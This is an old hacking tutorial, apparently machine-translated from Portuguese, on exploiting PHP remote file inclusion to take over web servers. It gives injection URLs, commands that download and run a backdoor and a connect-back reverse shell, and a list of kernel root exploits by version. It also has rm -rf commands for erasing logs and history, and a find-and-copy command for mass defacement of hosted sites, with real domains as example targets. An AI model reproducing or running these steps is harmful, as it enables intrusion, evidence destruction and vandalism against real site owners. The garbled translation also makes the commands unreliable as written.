PHP injection - Access Server

[Nytro]

#################

# Not written by me, but by phAnt0mh4ck3r of h4cky0u, Its not that well written, but sure covers stuff thats need to know.

#

1. What it is?

2. As to explore

3. Aid of google

4. Exploits local

5. Erasing Logs

6. As to arrange the vulnerability

7. Tools

8. Commands

1. What it is?

The known vulnerability more as: Remote File Inclusion, or remote Inclusao of archives, bug discovered between 2002 and 2003, to put still today many are unaware of it.

Bugs found sao in its majority, in scripts of php, exists disponiveis thousands for the Internet, every day new bugs of strings sao found and displayed in sites of security, and consecultivamente nao delay very to appear modified thousands of sites, and for coencidencia, 99% of these used scripts php bugados.

But where this espeficicamente bug, it eh found in funcoes of php, that joined with one script badly written, makes possible inclusao remote of archives, most used sao:

Main (, Include (, Include_Once (, and others, and generally funcao that it has bug is almost thus:

main (to $dir. ?file?)

We go to say that the arkivo that has this funcao if calls index.php, is enough the usuario now

in its navigator to type: index.php? dir=cmd < - q sera explained the front more.

Eh a simple error, but that it has caused great prejudices for the world.

2. As to explore

Vitima: Site that you will go to explore the imperfection of php.

String: Archives in the site suceptiveis to the attack.

Cmd: Script in PHP that in makes possible them to type

commands to be incluidos in php.

Backdoor: It opens doors in the system for remote connection 'without

autentica??o'.

Connect Back: It opens a door specifies for conexao between its

PC and vitima.

Exploit: Program that explores certain imperfection in a system.

It has some types of Exploits. Here, we will go

to deal only with Place Root Exploits. (they explore

imperfections local that they take common users

access root - super-user -)

Shell: It is an interpretative program of commands that

it allows the user to iteragir with the system

operational through typed commands.

Telnet: We will use for remote connections.

Firewall: It is an intelligent barrier between a local net

e the Internet, through which it only passes traffic

authorized. This traffic is examined by

firewall in real time and the election is made of

agreement with the rule. ?what it was not express

allowed, it is forbidden "

root: Super-user. He is admin? has total access to

system.

* Strings

Strings has several available. In this tutorial one, I will go to use stops

examples well simple one that is ?index.php? page=?. In annex, the end,

several others: P

* Syntax

Former:

www.site.com /arquivo.php? data= http://CMD/cmd.gif?&cmd= ls

^ ^ ^ ^

Vitima String CmD command unix

(P.S.: Without the spaces)

* Using the CmD

Cmd = http://www.site.com/cmd.gif?&cmd=

In the result, it inserts cmd in string.

Former: www.site.com/index.php?page=http://www.site.com/cmd.gif?&cmd=

In the CMD:

sysname: --> Operational system twirling.

nodename: --> local Name.

release: --> Version of kernel.

Script Current User: --> Using for which script is being executed.

PHP Version: --> Version of php of the machine

User Info: --> Information of user (uid, euid, gid).

Current Path: --> current Folder that you are in the server.

Server IP: --> IP of the server.

Web server: --> Information on the server.

* Gaining access to shell

He is the interpreter of commands of the machine. For this, she is necessary of: Backdoor and Connect Back.

* Twirling backdoor in the server for remote connection

To twirl a backdoor, it is enough to make one upload, to choose permissions, and to execute it.

Command: compact disc /var/tmp; wget www.site.onde.es t? .o.backdoor.com/backdoor;chmod 777 backdoor;. /backdoor

compact disc /var/tmp - > Faz the operation in this folder, for being common

all the users and had to its permissions.

/tmp tb serves:)

wget www. (...) /backdoor - > Copia the backdoor from a URL for

site. When wget not to function, tries others

commands. Syntaxes:

- Possiveis programs to make download of the archives

wget www.site.com/arquivo

lynx - source www.site.com/arquivo > archive

curl - the www.site.com/arquivo archive

GET www.site.com/arquivo > archive

(...)

Now, it is enough to connect itself shell. How?

In the Win: To initiate - > Executar - > telnet www.site.com carries

Where www.site.com receives name or IP from the site that you twirled the backdoor and carries is the door that the backdoor is working.

If to appear in the telnet bash-2.05b$ or something seemed, is because it functioned! E you have access to shell in the machine. If to delay a time and not to fall in shell, confer nome/ip of the server.

If he will be correct, it is twirling Firewall. E now? simple, Connect Back.

* Connect Back

Very efficient method to gain shell in a machine. It gains shell reversamente.

Windows: It lowers netcat for windows and in Prompt of MSDOS (in the folder that nc if finds), it types: nc - vv - l - p 15, where 15 can in accordance with be chosen its preference. This door will be the one that will carry through the connection.

Now, coming back to browser it, in cmd it types the following command:

compact disc /var/tmp; wget www.site.do.dc.com/dc;chmod 777 dc;. /dc IP carries

compact disc /var/tmp - > Exactly that for backdoor.

wget www.site.do.dc.com/dc - > | | | |, but is logico, with

address of dc.

./dc IP carries - > where IP is ITS IP and carries is the door

that you it chose in netcat.

Made this, if to occur all certainty, it will appear as resulted:

Connect Back Backdoor

* Dumping Arguments

* Resolving Host Name

* Connecting?

* Spawning Shell

* Detached

This means that you if it connected in shell!

If to appear

Connect Back Backdoor

* Dumping Arguments

* Resolving Host Name

* Connecting?

[-] Unable you the Connect

it confers the data (its IP, carries, netcat, etc). If to insist, its

not accepted net this type of connection. It tries other doors (as 80, 22,

15, etc).

4. Exploits local

2.4.17

newlocal

kmod

2.4.18

brk

newlocal

kmod

km.2

2.4.19

brk

newlocal

kmod

km.2

2.4.20

ptrace

kmod

km.2

brk

2.4.21

km.2

brk

ptrace

2.4.22

km.2

brk

ptrace

2.4.23

mremap_pte

2.4.24

mremap_pte

Uselib24

2.4.27

Uselib24

2.6.2

mremap_pte

krad

2.6.5 you the 2.6.10

krad krad2

5. Erasing Logs

rm - rf /var/log

rm - rf /var/adm

rm - rf /var/apache/log

rm - rf $HISTFILE

find/- name .bash_history - exec rm - rf {} ;

find/- name .bash_logout - exec rm - rf {} ;

find/- name log* - exec rm - rf {} ;

find/- name *.log - exec rm - rf {} ;

6. As to arrange the vulnerability

To edit the archive php.ini in the folder of configuration of its apache and incapacitating the functions:

they system, exec, passthru, shell_exec

7. Tools

Voce can find some tools in the sites:

- http://mescalin.100free.com

- http://www.packetstormsecurity.org

- http://www.milw0rm.com

- http://www.securiteam.com

8. Commands

ls - > List archives. It can be combined with - (shows occult) and - l (it shows at great length). Former: ls - la

(it shows the archives, also occult at great length).

uname - - > Mostra information of the system, as version of kernel,

uteis name, and other things.

id - > Mostra its id.

w - > List the users logados at the moment.

cp - > Copia archives. Syntax: cp /destino/ archive

mv - > Move archives. Sintexe: mv /destino/ archive

rm - > Remove archives. If combined with - rf, removes all

the setados archives, also folders

to mkdir - > diretorio Cria

to rmdir - > diretorio Exclui

find - > Procura for archives/folders. Former: ?find /etc - name

httpd.conf ?looks for for httpd.conf in the /etc folder

pwd - > Mostra where folder you are located

cat - > Exibe the content of an archive in the screen

head - > Exibe lines of the beginning of the archive

tail - > || || || final of the archive

ctrl+c - > Sai/killa one programs

ctrl+r - > Busca command typed in history of bash

ps - auxw - > List all the processes of the system

netstat - in - > Status of the connection

kill -9 - > Mata process. Syntax: kill -9 PID OF the PROCESS

kill - HUP - > Reinicia process. Syntax: kill - HUP ID OF the PROCESS

peak - > Publisher of text. Syntax: peak archive

vi - > | | vi archive

Saving resulted in archives

?/armazenado command > /arquivo/onde/ser

Former: ls /etc > /tmp/s.txt safe all the result of the listing of

/etc in the /tmp/s.txt archive

Adding lines in archives

echo ?line? >> /arquivo/onde/ser ?/incluido

Unpacking archives (most common)

.tar - > to tar xvf arquivo.tar

.tar.gz - > to tar zxvf arquivo.tar.gz

.tar .bz2 - > to tar jxvf arquivo.tar .bz2

.zip - > unzip arquivo.zip

Compactando archives (most common)

.tar - > to tar cvf destino.tar ARCHIVE

.tar.gz - > to tar cvf destino.tar ARCHIVE | gzip destino.tar

.tar .bz2 - > to tar cvf destino.tar ARCHIVE | bzip2 destino.tar

.zip - > zip DES tino.zip ARQUIVO

* List of sites running on server

* Using httpd.conf file

Generally the data of the housed sites are in this archive. To make a listing of the sites, it is enough to type a command that will go to read the archive httpd.conf and to print the lines that contain ServerName

(name of the sites). (in the folder where httpd.conf if finds)

cat httpd.conf | grep ServerName

(they will be in this archive same, you result can to save in archive - preferential in the folder of the site that you left - and to make download)

---->

How? Good, in the CMD, it types pwd. You it will see the place where you

if it finds in the server. Former: /home/httpd/vhosts/nasa.gov/web/

Let us say that the URL is this: http://nasa.gov/index.php?page=CMD

Then, if you to play the result for /home/httpd/vhosts/nasa.gov/web

This archive will be in the root of the site. To only type this command:

cat httpd.conf | grep ServerName > /home/httpd/vhosts/nasa.gov/web/RESULTADO.txt

(only one example)

Made this, http://nasa.gov/RESULTADO.txt and to lower the list: P

<----

Now, where it is this? GENERALLY in the folders /etc/httpd/conf or /etc/apache/conf but it varies very and it can be found in other places. An efficient way, to put delayed, to find is making a complete search for sitema. Command:

find/- name httpd.conf

This prints where he is httpd.conf in the server. It can appear more than a result.

* Other ways?

If exactly thus, not to obtain to find which sites has there, looks alternative forms. Unhappyly it does not have as to explain therefore in each server it has a way.

Example:

If in the folder where the sites are located, you to list them and the result ja will have the name and domain of them: former: ls /home/httpd/vhosts

site.com

mtv.com .br

nasa.gov

whitehouse.gov

etc

* Making Mass Defacement

Good, first, it creates one index that you it wants that is in the place of the others. Made it, plays for some place that you can make upload pro server.

Now, the end: to change to all the others for its. Simple, a command for this is enough:

find /pasta/onde/est ?o/os/sites - name ?index.*? - exec cp /onde/est ?/sua/index.html {} ;

To know where they are the sites, only pwd in cmd. Former: /home/httpd/vhosts/nasa.gov/web

One notices that all the others are in /home/httpd/vhosts.

Equal backdoor makes upload. wget http://suaindex.com/sua.index

Let us say that you it made for the /tmp folder, then, the command would be thus:

find /home/httpd/vhosts - name ?index.*? - exec cp /tmp/index.html {} ;